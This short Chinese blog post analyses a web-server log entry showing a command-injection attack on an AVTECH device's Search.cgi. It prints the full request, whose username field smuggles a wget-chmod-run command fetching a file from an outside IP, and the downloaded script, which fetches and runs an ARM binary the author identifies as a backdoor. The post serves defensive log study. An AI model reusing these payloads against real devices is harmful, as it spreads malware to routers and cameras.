2018年10月18日 星期四

從 Web Log 學習系統漏洞 26

來自捷克使用Linux系統的Router Webserver, 嘗試下載 avtech 這個程式(指令), 變更權限後再執行

77.240.102.116 - - [18/Oct/2018:08:46:34 +0800] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1" 400 226 "-" "Sefa"

下載來的 avtech 中的內容:
cd /tmp; wget http://209.141.40.213/bins/sefa.arm; chmod 777 sefa.arm; ./sefa.arm avtech.arm; rm -rf sefa.arm

內容表示繼續從同一個IP:209.141.40.213下載 sefa.arm 這個編碼過的程式然後執行

經掃描結果確定為後門

沒有留言:

張貼留言